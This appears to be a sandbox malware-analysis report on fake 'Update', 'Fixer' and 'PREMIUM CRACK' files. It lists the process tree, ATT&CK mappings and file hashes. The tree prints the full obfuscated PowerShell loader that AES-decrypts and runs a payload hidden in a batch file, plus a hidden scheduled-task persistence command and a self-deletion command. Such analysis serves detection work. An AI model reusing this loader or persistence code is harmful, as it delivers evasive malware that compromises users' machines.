  "Update.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RUxtm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Update.bat').Split([Environment]::NewLine);foreach ($_CASH_LNxNp in $_CASH_RUxtm) { if ($_CASH_LNxNp.StartsWith(':: @')) { $_CASH_yPRQJ = $_CASH_LNxNp.Substring(4); break; }; };$_CASH_yPRQJ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_yPRQJ, '_CASH_', '');$_CASH_muQWL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_yPRQJ);$_CASH_JXFbf = New-Object System.Security.Cryptography.AesManaged;$_CASH_JXFbf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_JXFbf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_JXFbf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x3+Q7vlJHhTCSNOf1jrLe0x+EhsJz3GnAnKuRYsrqbo=');$_CASH_JXFbf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zmeeMIGlZmSaE3quwUWDog==');$_CASH_QulMc = $_CASH_JXFbf.CreateDecryptor();$_CASH_muQWL = $_CASH_QulMc.TransformFinalBlock($_CASH_muQWL, 0, $_CASH_muQWL.Length);$_CASH_QulMc.Dispose();$_CASH_JXFbf.Dispose();$_CASH_yNIQt = New-Object System.IO.MemoryStream(, $_CASH_muQWL);$_CASH_qBdio = New-Object System.IO.MemoryStream;$_CASH_QiMcy = New-Object System.IO.Compression.GZipStream($_CASH_yNIQt, [IO.Compression.CompressionMode]::Decompress);$_CASH_QiMcy.CopyTo($_CASH_qBdio);$_CASH_QiMcy.Dispose();$_CASH_yNIQt.Dispose();$_CASH_qBdio.Dispose();$_CASH_muQWL = $_CASH_qBdio.ToArray();$_CASH_GqFfC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_muQWL);$_CASH_XJUrC = $_CASH_GqFfC.EntryPoint;$_CASH_XJUrC.Invoke($null, (, [string[]] ('')))
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\Update')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_15_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_15.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5416
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_15.vbs"
    3⤵
    - Checks computer location settings
    PID:4876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_15.bat" "
      4⤵
      PID:4336
    - - C:\Users\Admin\AppData\Roaming\startup_str_15.bat.exe
        
        "startup_str_15.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RUxtm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_15.bat').Split([Environment]::NewLine);foreach ($_CASH_LNxNp in $_CASH_RUxtm) { if ($_CASH_LNxNp.StartsWith(':: @')) { $_CASH_yPRQJ = $_CASH_LNxNp.Substring(4); break; }; };$_CASH_yPRQJ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_yPRQJ, '_CASH_', '');$_CASH_muQWL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_yPRQJ);$_CASH_JXFbf = New-Object System.Security.Cryptography.AesManaged;$_CASH_JXFbf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_JXFbf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_JXFbf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x3+Q7vlJHhTCSNOf1jrLe0x+EhsJz3GnAnKuRYsrqbo=');$_CASH_JXFbf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zmeeMIGlZmSaE3quwUWDog==');$_CASH_QulMc = $_CASH_JXFbf.CreateDecryptor();$_CASH_muQWL = $_CASH_QulMc.TransformFinalBlock($_CASH_muQWL, 0, $_CASH_muQWL.Length);$_CASH_QulMc.Dispose();$_CASH_JXFbf.Dispose();$_CASH_yNIQt = New-Object System.IO.MemoryStream(, $_CASH_muQWL);$_CASH_qBdio = New-Object System.IO.MemoryStream;$_CASH_QiMcy = New-Object System.IO.Compression.GZipStream($_CASH_yNIQt, [IO.Compression.CompressionMode]::Decompress);$_CASH_QiMcy.CopyTo($_CASH_qBdio);$_CASH_QiMcy.Dispose();$_CASH_yNIQt.Dispose();$_CASH_qBdio.Dispose();$_CASH_muQWL = $_CASH_qBdio.ToArray();$_CASH_GqFfC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_muQWL);$_CASH_XJUrC = $_CASH_GqFfC.EntryPoint;$_CASH_XJUrC.Invoke($null, (, [string[]] ('')))
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:6072
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_15')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\FIxer.bat" "
1⤵
PID:5216
- C:\Users\Admin\Downloads\FIxer.bat.exe
  "FIxer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RbGXZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\FIxer.bat').Split([Environment]::NewLine);foreach ($_CASH_yShvh in $_CASH_RbGXZ) { if ($_CASH_yShvh.StartsWith(':: @')) { $_CASH_htVii = $_CASH_yShvh.Substring(4); break; }; };$_CASH_htVii = [System.Text.RegularExpressions.Regex]::Replace($_CASH_htVii, '_CASH_', '');$_CASH_gxaUQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_htVii);$_CASH_tNFYv = New-Object System.Security.Cryptography.AesManaged;$_CASH_tNFYv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tNFYv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tNFYv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('stOdklJYreIdm/YGNy+nWCCs5XfEGhL2PqU03YNrbO4=');$_CASH_tNFYv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0108NVZ5xw9HpRSjSqRPXQ==');$_CASH_KEZfr = $_CASH_tNFYv.CreateDecryptor();$_CASH_gxaUQ = $_CASH_KEZfr.TransformFinalBlock($_CASH_gxaUQ, 0, $_CASH_gxaUQ.Length);$_CASH_KEZfr.Dispose();$_CASH_tNFYv.Dispose();$_CASH_nWslU = New-Object System.IO.MemoryStream(, $_CASH_gxaUQ);$_CASH_ZGTxp = New-Object System.IO.MemoryStream;$_CASH_TSmhI = New-Object System.IO.Compression.GZipStream($_CASH_nWslU, [IO.Compression.CompressionMode]::Decompress);$_CASH_TSmhI.CopyTo($_CASH_ZGTxp);$_CASH_TSmhI.Dispose();$_CASH_nWslU.Dispose();$_CASH_ZGTxp.Dispose();$_CASH_gxaUQ = $_CASH_ZGTxp.ToArray();$_CASH_uxxtl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_gxaUQ);$_CASH_fbfIS = $_CASH_uxxtl.EntryPoint;$_CASH_fbfIS.Invoke($null, (, [string[]] ('')))
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\FIxer')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_687_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_687.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5560
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_687.vbs"
    3⤵
    - Checks computer location settings
    PID:3068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_687.bat" "
      4⤵
      PID:3320
    - - C:\Users\Admin\AppData\Roaming\startup_str_687.bat.exe
        
        "startup_str_687.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RbGXZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_687.bat').Split([Environment]::NewLine);foreach ($_CASH_yShvh in $_CASH_RbGXZ) { if ($_CASH_yShvh.StartsWith(':: @')) { $_CASH_htVii = $_CASH_yShvh.Substring(4); break; }; };$_CASH_htVii = [System.Text.RegularExpressions.Regex]::Replace($_CASH_htVii, '_CASH_', '');$_CASH_gxaUQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_htVii);$_CASH_tNFYv = New-Object System.Security.Cryptography.AesManaged;$_CASH_tNFYv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tNFYv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tNFYv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('stOdklJYreIdm/YGNy+nWCCs5XfEGhL2PqU03YNrbO4=');$_CASH_tNFYv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0108NVZ5xw9HpRSjSqRPXQ==');$_CASH_KEZfr = $_CASH_tNFYv.CreateDecryptor();$_CASH_gxaUQ = $_CASH_KEZfr.TransformFinalBlock($_CASH_gxaUQ, 0, $_CASH_gxaUQ.Length);$_CASH_KEZfr.Dispose();$_CASH_tNFYv.Dispose();$_CASH_nWslU = New-Object System.IO.MemoryStream(, $_CASH_gxaUQ);$_CASH_ZGTxp = New-Object System.IO.MemoryStream;$_CASH_TSmhI = New-Object System.IO.Compression.GZipStream($_CASH_nWslU, [IO.Compression.CompressionMode]::Decompress);$_CASH_TSmhI.CopyTo($_CASH_ZGTxp);$_CASH_TSmhI.Dispose();$_CASH_nWslU.Dispose();$_CASH_ZGTxp.Dispose();$_CASH_gxaUQ = $_CASH_ZGTxp.ToArray();$_CASH_uxxtl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_gxaUQ);$_CASH_fbfIS = $_CASH_uxxtl.EntryPoint;$_CASH_fbfIS.Invoke($null, (, [string[]] ('')))
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_687')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5512
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_687.bat.exe" & del "C:\Users\Admin\AppData\Roaming\startup_str_687.bat.exe"
        6⤵
        
        PID:5812
        
        C:\Windows\system32\choice.exe
        
        choice /c y /n /d y /t 1
        7⤵
        
        PID:2872
        
        C:\Windows\system32\attrib.exe
        
        attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_687.bat.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5036

C:\Users\Admin\Downloads\PREMIUM CRACK.exe
"C:\Users\Admin\Downloads\PREMIUM CRACK.exe"
1⤵
- Drops startup file
- Executes dropped EXE
PID:5568
- C:\Users\Admin\AppData\Local\Temp\dcd.exe
  "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
  2⤵
  - Executes dropped EXE
  PID:6092

C:\Users\Admin\Downloads\Eternity.exe
"C:\Users\Admin\Downloads\Eternity.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
0cbded1f5ecd2249bb3fd39ad5f3295c

SHA1
728061e7bed89a4d25f39728369f5c5ac14d1405

SHA256
ce06407abdaaefbaf0f41e02d24e6ada1942c80c0598a6570f3f7ab9035aedfd

SHA512
6755280a19aa874c696393341095959e853332c735685ce44c240661bf379b30953c8b4a552ff21c63c18c7bea6d57afdf0eb5737b680fc045624fc5144e43e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\f737adf0-74ca-4956-9fc8-53a21f7449e8.tmp

Filesize
1KB

MD5
44f648660b47030afef9aefa4760a7fb

SHA1
1b48606fd48eca40f08421477190610189601cfa

SHA256
02f4a32109c8c3031b9ace280e73b8d3f60fb1ab8c993a00d793bcd67c3a9e57

SHA512
c5f51a2da2db4f80ad55df675d2095bc678073b492ec98a03c312efd48295bd0c43c57b3b4f7c3cd817c4278ec2b5aa0a88c668ae2b475300ec0d66aee562d03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\220270b1-e3f3-41ad-87a9-11115d7f7227.tmp

Filesize
11KB

MD5
9cf04eb8ae4a013fa76737550a62e27d

SHA1
27ccb7446cd1b12a248eb084b7ab0c9cddf77a63

SHA256
0cee11b8dc12f82d3a4cab63c8e9f488ef6419baa0cecbf5ccdc8a5617f5f47c

SHA512
0ca2c1a7cdbeee45e4d0e29680c84afcfa44bd62b834b7c1a764b8da287fae46f6d2e88d0d6a074ab97bc8378f51d035dd634dcf59ae2987a62c544dc8c869c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\38eed3d7-9bb5-426d-b70e-8e69d6d8d538.tmp

Filesize
11KB

MD5
222b24230e7a3fd3e207ed8b55ceb4d0

SHA1
f2f5b38bfd0fc6f7236c29ff0421618b448f0a47

SHA256
caf0f5769a9a5db9c6e1759176bff2e9c711884adcf5688bf2f52151e7e2e34a

SHA512
e11a935c8cc2db5c64d9c7efb2f61504dcac1b4fe851806575ef446c37ef57f0c60bca10bae4792cf88c4f6ed9dd0bbf5fd9adb237a47edbf9c420346447caaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e494d16e4b331d7fc483b3ae3b2e0973

SHA1
d13ca61b6404902b716f7b02f0070dec7f36edbf

SHA256
a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165

SHA512
016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0764f5481d3c05f5d391a36463484b49

SHA1
2c96194f04e768ac9d7134bc242808e4d8aeb149

SHA256
cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3

SHA512
a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
b85f08c4eec7c3ebd291259c05cf0475

SHA1
ca826ff646854a5c036027cfb7ff9a6f193b5826

SHA256
2f07e5d91adbd68b315475fcd14a14e3883cc793cd9ecbd0f1db5f4266871f83

SHA512
dd3296d2cd2e4978b6ff5725543c79ec3b63d0b950e32a61233d038533b22c21852389f50bb5f58aff95dce8ed1f5fdf7f9ad563b0cd411b7d1370b8bf6214f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
317B

MD5
afc6cddd7e64d81e52b729d09f227107

SHA1
ad0d3740f4b66de83db8862911c07dc91928d2f6

SHA256
b5e81a7c7d80feaaa10ee7bc8aaef9f21a5c1e4b03b3823ed115022311d674a0

SHA512
844edb69585153c378a7c97709983776fc9303a32fb5ef8122ecca32adfc0b265f5ef7118ee07814da5c020ac7ba1bf2a2f66d46312e4d8e6df99aab2e5f9b2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
96f11b577e69b250754e251580ffed66

SHA1
8e7ac86490ebceeecef91b77ce9281204ca1800c

SHA256
ae1880cde6832386ae41d3eb46e3383d7ef9cbd4a0a67fff6ec396326a54d94a

SHA512
65a7e4312ef2bdfeebab5f9954446adace020d62835e8be84283b86a2148fdb4e41eb56a335cdf751750dcb3017d224ad8c0fcf2e9c08ac9b0dfe18159451779

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
efd307df8b722717cdea3070d8bc1db3

SHA1
a2e5d1c05aebdc61e702d6b700db8b73a27dd967

SHA256
c88beb6a7fe5de3ea24d3691efb6dd06d20d309c5596d2ddc21841d9c57eecc0

SHA512
279c416d387acc53b8991e6ad0a8da08226ce890a0ea550d6e4ef2451d81d55c1946ae5f128e95634e09f9dc5e6a795cbd9ddfe7f92e3cdf46e424ae999a3d2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
1KB

MD5
bd8ad48b88c2b5e0458268838c1257f8

SHA1
8edaac0f387c8d2bd11bc980bbfb567228b3b7b9

SHA256
4a6ebdc6d5a48a45eb3045a53a0c986feaddd362f1f865c17a6cbc32aed21818

SHA512
7da193d6c08cf5eed4301a86d9270bd45ee25011b5511460d6e91c6f893343ee2a470bd79a87db4c7139c6d465b2b486ad148798ec4f436656981702d84d8916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
f389640b8b0deae61a5f2680f2408491

SHA1
99a95ff9896dc0200a3106e29c704df9bfac085d

SHA256
ffeabe8ca74afedf4de5bf5a5238816e9f6dfa08e18126de005ccdc931015e5f

SHA512
ac8a724dc1a280c53c0884cf63f83d085d1b541ff29ca54ff85970615b8fb0b6282c60a02aedd6ca963504417d1c677e86e4d7bd0c39cff211eb8034fb7ef3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4373abae4880a277a3859f5734143a19

SHA1
a71759a565541fba5e1ee8d3fceee7645ed75054

SHA256
f151ef7e7996f479ba2ab9334d50ff36ae85917c4451614a254b121d328eb607

SHA512
0af72c0f2ff8716e99a84e67ef4bb921e389459b90f76ca17340384aabcdf41a10c2191801c8d343b649cb547ea8182ca367b7aa6176d7304394be4b9bfe8718

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4f385403797c6bbd72588509981594e7

SHA1
3be287e2a7de6498788f409d7c9a258a931d3860

SHA256
ffe4f8c16fa216fc164e65d765b7832d7bbb4cbbdbcd82188841f5fe2a6c5716

SHA512
aa3e7c058d681270a246621dd9592608a85ec9171c9e2d9651e90ceb707811e2df5b08308b66a6258d24483432e6589e38a22b5bfc8d819b6c12812ebeceed28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc2ce575753731574bf10ff6e5162032

SHA1
b660e5156f97af770e5d359fdd2a6ea697f359fb

SHA256
c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa

SHA512
715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d5d3ca75273a00e8a909312104d00bdc

SHA1
e052405a4afec7f4b59c3fa301dbbea1cbdbcb8d

SHA256
84c17462219884baaa72dd37073ee7c32cd65ea28df3b6038fdf4050e0b3d72a

SHA512
5bb97eb7f7efeb0e4387cfa86befdc6b25027fc6f900c930ca570dd684ba5f0658dc1f193f8e21f1a0720811e3caf2e55edf0681785124e6fee1537a83a446e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_po0xj2yz.wir.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dcd.exe

Filesize
227KB

MD5
b5ac46e446cead89892628f30a253a06

SHA1
f4ad1044a7f77a1b02155c3a355a1bb4177076ca

SHA256
def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

SHA512
bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

Download Submit
C:\Users\Admin\AppData\Local\Temp\enet_managed_resource\enet-win32-x86.dll

Filesize
39KB

MD5
e13ef136485a33c8a5b719d75b0312df

SHA1
fb692915b0a73e796c5904e05d37f963baef88dd

SHA256
9d2d83667ab5c391fbb60a1249078d0e2b031573a72dc07b67b610178ee94e78

SHA512
b3d58a11fc17925316f437e67d4b394bb9b5749e92064fe87eda3e12962f3970416e180cd40c61419651ec611eae0ee9f91a795199689cdd4743678bb6d3dca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAE8F.tmp

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAEC4.tmp

Filesize
92KB

MD5
b10be874867a4f41849b9187cb98d1de

SHA1
2a2ceb44953f4978308e04286872050b5e2071e4

SHA256
12726259350583d4b137a4ca783e463b8629a198d6934a43818bdb726e5d858c

SHA512
1450573f2674676c124f0ee1beedcae92bc265d7c100fa587565ee15f13c94f69b9ece621742b0b840681a0b97bde3314508682ff85de75b78e27f39dfa46e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAEFF.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAF05.tmp

Filesize
20KB

MD5
79371bbfee7df118a420db60dfdd3cce

SHA1
af8b04f5f0ba4f3d272c3fcd9b869b6c81c59847

SHA256
bd1fc7ae7e82ef2872f78c99271c99ad7a51aa0f1675b99a14b370ade2d32696

SHA512
40743ce47b0668bafd3cfaae65c9c06b7f038691c930eeb4359e70ab738124b1a123a684b02e82f000c221e2f5bfd428d61e06050268e99e2ec97f3b31b3ca1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAF26.tmp

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAF41.tmp

Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_15.vbs

Filesize
114B

MD5
c3f26575223e47ca4b24df87bf374613

SHA1
8d17f315da3c37908499e7fb9c0aaa2e8c2ebe6a

SHA256
83b973d9d6750b9c00b41bb56e1c3e28edad65d4dc63dbe9ce2b6009291924e0

SHA512
f0fa561684b5118e774c2bf86a66ed99e82c257b1521dd031875edecfc18670b3f3509f3f1890cf72a96cf7821640a6b6562b0f40dd0740c144718a40d000a2e

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_687.bat

Filesize
256KB

MD5
a76d6740e0e8dbf510006c94590a7743

SHA1
4ec9aecfd133a6e000846c302fe35fa384ddd67e

SHA256
761bf05f66aabac2b06f5cbcd525775d50532df480c70e7f3f23c294c4a3e219

SHA512
2750a4dbf7cfadf7234adcadf023de05bfd0874bbc1813d876ebc3d239f88dcc945c7e365d4909a8ac6dbfd3fffe4ee16ba256ed2db92e1f573cdc4231db1324

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_687.vbs

Filesize
115B

MD5
7df1709c7ec05f329ec1251b0ff320df

SHA1
d9575f5615d8bd0b38ce5d3870669420d3d83b18

SHA256
2eaf58c533573b0186e2cad590c6edb15db7b126955ecdd1ba560d201a498120

SHA512
18b1b47bcb72160311873a0de798b0a5c34327f6fb48fe13ae99475583bb9089fdaeab487cf5353865a5c22a348489dfecc3270360359524f73bf595cc6f6b5f

Download Submit
C:\Users\Admin\Downloads\Bunifu.dll

Filesize
232KB

MD5
a956773892ea3bb538c4656475c35126

SHA1
e2cc84075cd18b96623fd29d529873f379e398c2

SHA256
d95d7cdb4a549a7f9a06c9059027bd90e926a15b21f118a59536ee9b5febb768

SHA512
d376b8700d2461e63c4da6fc0dedcc33aa44dca4766fa50fa2cc4475d8bb00fc919568967a2f3b250b8f40a3e45bf48421f3b7f35e081a55805683f3092645e7

Download Submit
C:\Users\Admin\Downloads\DiscordRPC.dll

Filesize
82KB

MD5
3956130e36754f184a0443c850f708f8

SHA1
4874cd51b0fa5652ed84e3b0c123bee05dcdffc8

SHA256
